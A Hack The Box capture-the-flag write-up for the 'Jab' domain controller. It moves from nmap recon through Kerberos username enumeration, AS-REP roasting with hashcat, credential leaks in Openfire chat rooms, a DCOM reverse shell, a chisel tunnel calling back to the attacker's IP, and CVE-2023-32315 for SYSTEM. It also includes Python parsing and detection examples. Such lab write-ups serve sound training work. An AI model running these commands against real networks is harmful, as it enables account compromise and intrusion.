Recon
Let's start with an nmap scan.
┌──(kali㉿kali)-[~/Desktop/HTB/Jab]
└─$ nmap -p- -T4 jab.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 08:17 BST
Nmap scan report for jab.htb (10.10.11.4)
Host is up (0.044s latency).
Not shown: 65459 closed tcp ports (conn-refused), 40 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5222/tcp open xmpp-client
5223/tcp open hpvirtgrp
5262/tcp open unknown
5263/tcp open unknown
5269/tcp open xmpp-server
5270/tcp open xmp
5275/tcp open unknown
5276/tcp open unknown
5985/tcp open wsman
7070/tcp open realserver
7443/tcp open oracleas-https
7777/tcp open cbt
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49674/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49681/tcp open unknown
49790/tcp open unknown
53728/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 301.96 seconds
┌──(kali㉿kali)-[~/Desktop/HTB/Jab]
└─$ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5222,5223,5262,5263,5269,5270,5275,5276,5985,7070,7443,7777,9389,47001,49664,49665,49666,49667,49671,49674,49675,49676,49681,49790,53728 -sC -sV -T4 jab.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 08:27 BST
Nmap scan report for jab.htb (10.10.11.4)
Host is up (0.044s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-22 07:23:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-22T07:24:48+00:00; -4m13s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
|_ssl-date: 2024-04-22T07:24:46+00:00; -4m14s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
|_ssl-date: 2024-04-22T07:24:48+00:00; -4m13s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-22T07:24:46+00:00; -4m14s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| auth_mechanisms:
| errors:
| invalid-namespace
| ( timeout )
| compression_methods:
| features:
| xmpp:
| version: 1.0
| capabilities:
|_ stream_id: 8mjpiz9qic
5223/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| ( timeout )
| compression_methods:
| features:
| xmpp:
| auth_mechanisms:
|_ capabilities:
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
5262/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| auth_mechanisms:
| errors:
| invalid-namespace
| ( timeout )
| compression_methods:
| features:
| xmpp:
| version: 1.0
| capabilities:
|_ stream_id: 55iww1rf7w
5263/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| ( timeout )
| compression_methods:
| features:
| xmpp:
| auth_mechanisms:
|_ capabilities:
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
5269/tcp open xmpp Wildfire XMPP Client
| xmpp-info:
| Respects server name
| info:
| xmpp:
| version: 1.0
| capabilities:
| pre_tls:
| xmpp:
| capabilities:
| features:
| TLS
| Server Dialback
| post_tls:
| xmpp:
| lang: en-US
|_ capabilities:
5270/tcp open ssl/xmpp Wildfire XMPP Client
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
5275/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| auth_mechanisms:
| errors:
| invalid-namespace
| ( timeout )
| compression_methods:
| features:
| xmpp:
| version: 1.0
| capabilities:
|_ stream_id: 7529c6ngrx
5276/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| ( timeout )
| compression_methods:
| features:
| xmpp:
| auth_mechanisms:
|_ capabilities:
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7070/tcp open realserver?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 22 Apr 2024 07:23:29 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 223
| <html>
| <head><title>Openfire HTTP Binding Service</title></head>
| <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 22 Apr 2024 07:23:35 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_<h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7443/tcp open ssl/oracleas-https?
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 22 Apr 2024 07:23:36 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 223
| <html>
| <head><title>Openfire HTTP Binding Service</title></head>
| <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 22 Apr 2024 07:23:41 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_<h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
7777/tcp open socks5 (No authentication; connection failed)
| socks-auth-info:
|_ No authentication
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49790/tcp open msrpc Microsoft Windows RPC
53728/tcp open msrpc Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service:
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-04-22T07:24:39
|_ start_date: N/A
|_clock-skew: mean: -4m13s, deviation: 0s, median: -4m13s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 87.01 seconds
The scan shows a large number of open ports on a Windows host. Along the way we also see several hostnames in the banners and certificates (jab.htb, dc01.jab.htb). To make them resolvable for the tools that follow, add their entries to the /etc/hosts file.
At first glance, the open ports 88 (Kerberos) and 389 (LDAP) indicate a domain controller. We can also notice some non-standard ports: 5222, 5269, 7070, 7443 and 7777. From the same Nmap result we can see that this machine is running the XMPP protocol (Ignite Realtime Openfire). The host scripts also report a clock skew of -4m13s; Kerberos rejects requests whose timestamps differ from the DC's by more than 5 minutes by default, so a skew of this size is worth noting before any Kerberos tooling is used.
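The triage above (collect hostnames for /etc/hosts, spot the DC and XMPP indicators, note the clock skew) can be done mechanically over nmap's normal output. This is an added example, not part of the original writeup; the input is a constructed, abridged excerpt of the scan shown above.

```python
import re

# Constructed, abridged excerpt of the nmap -sC -sV output shown above.
NMAP_OUTPUT = """\
Nmap scan report for jab.htb (10.10.11.4)
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-22 07:23:30Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
7070/tcp open realserver?
7777/tcp open socks5 (No authentication; connection failed)
|_clock-skew: mean: -4m13s, deviation: 0s, median: -4m13s
"""

REPORT_RE = re.compile(r"^Nmap scan report for (\S+) \((\d+\.\d+\.\d+\.\d+)\)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$")
NAME_RE = re.compile(r"(?:commonName=|DNS:)([\w.*-]+)")   # certificate CN and SAN entries

def parse_nmap(text):
    """Return (ip, {port: (service, version)}, hostnames, clock-skew string or None)."""
    ip, ports, hosts, skew = None, {}, set(), None
    for line in text.splitlines():
        if m := REPORT_RE.match(line):
            ip, hosts = m.group(2), hosts | {m.group(1).lower()}
        elif m := PORT_RE.match(line):
            ports[int(m.group(1))] = (m.group(2), m.group(3).strip())
        elif "clock-skew" in line:
            skew = line.rsplit("median:", 1)[-1].strip()
        # certificate names become /etc/hosts candidates; wildcards are not resolvable names
        hosts |= {h.lower() for h in NAME_RE.findall(line) if not h.startswith("*")}
    return ip, ports, hosts, skew

def hosts_entry(ip, hosts):
    """One /etc/hosts line mapping every discovered name to the scanned IP."""
    return f"{ip} " + " ".join(sorted(hosts))

def classify(ports):
    """Reproduce the writeup's reasoning: DC indicators, XMPP ports, the odd SOCKS proxy."""
    findings = []
    if 88 in ports and 389 in ports:
        findings.append("domain controller (Kerberos 88 + LDAP 389)")
    xmpp = sorted(p for p, (svc, ver) in ports.items() if svc in ("jabber", "xmpp") or "Openfire" in ver)
    if xmpp:
        findings.append("XMPP/Openfire on " + ",".join(map(str, xmpp)))
    if 7777 in ports and ports[7777][0] == "socks5":
        findings.append("SOCKS5 proxy on 7777 (no authentication)")
    return findings
```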
Some googling tells us this is a messaging service, so let's dig in to learn more about it. First of all we need a way to interact with the service. Since the machine is running the server side, we need a client; as XMPP is a well-known open protocol, finding a suitable client is straightforward. We'll use Pidgin as the client, since it is easy to install and use.
To access the chat rooms, you'll need to create an account on the server. Once you've done that, you can join the test2@conference.jab.htb chat room. If nobody is currently present in the room there is nobody to interact with, so you can simply leave it. Additionally, Pidgin's XMPP Service Discovery plugin lets us browse the services and rooms the server offers.
As a very first step we can try to enumerate all users in the jab.htb domain. To do that we need:
A user list (available online).
A tool to send requests to the DC; we use kerbrute.
kerbrute userenum --dc dc01.jab.htb -d jab.htb -v jsmith.txt --hash-file NP.txt | tee kerbrute.out
Another important insight gained from this action is the harvesting of AS-REP hashes (the encrypted part of the AS-REP reply, which kerbrute writes out with --hash-file). This is possible because those accounts have Kerberos pre-authentication disabled, making them vulnerable to AS-REP roasting.
Run hashcat on those hashes using rockyou.txt:
hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt
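From the DC's side, both halves of what just happened (kerbrute guessing usernames, then the KDC issuing AS-REPs for accounts with pre-authentication disabled) are visible in Security event 4768. The detection below is an added example, not part of the original writeup; the events are constructed samples in a simplified key=value form rather than the real Windows export format, 10.10.14.140 is the attack box from the writeup, and the guess01..guess03 names are made up.

```python
from collections import Counter

# Constructed sample 4768 (Kerberos TGT requested) events, one per line, in a
# simplified key=value form. Status 0x6 is KDC_ERR_C_PRINCIPAL_UNKNOWN.
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=jmontgomery IpAddress=10.10.14.140 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=svc_openfire IpAddress=10.10.11.4 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=guess01 IpAddress=10.10.14.140 PreAuthType=0 TicketEncryptionType=0x17 Status=0x6",
    "EventID=4768 TargetUserName=guess02 IpAddress=10.10.14.140 PreAuthType=0 TicketEncryptionType=0x17 Status=0x6",
    "EventID=4768 TargetUserName=guess03 IpAddress=10.10.14.140 PreAuthType=0 TicketEncryptionType=0x17 Status=0x6",
    "EventID=4769 TargetUserName=jmontgomery IpAddress=10.10.14.140 Status=0x0",
]

UF_DONT_REQUIRE_PREAUTH = 0x400000  # userAccountControl bit behind "no pre-authentication"

def parse_event(line):
    """Turn one key=value line into a dict."""
    return dict(field.split("=", 1) for field in line.split())

def analyze_4768(lines, enum_threshold=3):
    """Flag AS-REP roastable accounts and likely username-enumeration sources.

    A successful 4768 with PreAuthType 0 means the KDC handed out an AS-REP without
    any pre-authentication; that reply is what kerbrute saved with --hash-file, and
    etype 0x17 (RC4) is the $krb5asrep$23$ format that hashcat mode 18200 cracks.
    Many Status 0x6 failures from one IP are a wordlist being thrown at the KDC.
    """
    roastable, unknown_by_ip = {}, Counter()
    for ev in map(parse_event, lines):
        if ev.get("EventID") != "4768":
            continue
        if ev["Status"] == "0x0" and ev["PreAuthType"] == "0":
            roastable[ev["TargetUserName"].lower()] = ev["TicketEncryptionType"]
        elif ev["Status"] == "0x6":
            unknown_by_ip[ev["IpAddress"]] += 1
    enum_sources = sorted(ip for ip, n in unknown_by_ip.items() if n >= enum_threshold)
    return {"roastable_accounts": roastable, "enum_sources": enum_sources}

def preauth_disabled(user_account_control):
    """Remediation check: True if the account's userAccountControl still has pre-auth disabled."""
    return bool(user_account_control & UF_DONT_REQUIRE_PREAUTH)
```

Accounts reported under roastable_accounts are the ones whose userAccountControl needs the DONT_REQUIRE_PREAUTH bit cleared.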
We got the password of jmontgomery. Now we can go back to Pidgin and log in using those creds.
After logging in we search for rooms again and find a new one: Pentest2003.
Joining that room gives us the password of svc_openfire.
Initial Access
Using impacket's dcomexec.py and svc_openfire's creds we can get a reverse shell.
impacket-dcomexec 'jab.htb/svc_openfire:Password@dc01.jab.htb' 'command' -nooutput -object MMC20 -dc-ip 10.10.11.4
We have our user flag.
Privilege Escalation
Further enumeration reveals two peculiar ports, 9090 and 9091, listening only on the local system:
netstat -ano | findstr '127.0.0.1:'
We can test whether a web app is behind them:
Invoke-WebRequest -Uri http://127.0.0.1:9090/ -UseBasicParsing
Receiving HTTP/1.1 200 OK tells us that a web application is indeed running locally. To interact with it we must forward the port from the DC machine to our attack box, so that the service is reachable locally on our side. We'll use the well-known tool Chisel for this.
First we need to set up a chisel server on our attack box:
chisel server -p 9999 --reverse
Next, we transfer chisel to the DC, start a client there and connect it back to our server. Chisel ships per platform, so we need a Linux build for Kali and a Windows build for the target.
./chisel client 10.10.14.140:9999 R:9090:127.0.0.1:9090
Now, by navigating to http://127.0.0.1:9090, we can reach and interact with the web application: the Openfire admin console.
We can log in with the svc_openfire username and the password we found earlier.
This web server is vulnerable to CVE-2023-32315.
Using this we obtain code execution and can confirm we are running as SYSTEM.
We set up another netcat listener to catch a reverse shell as SYSTEM.
We've got our root flag.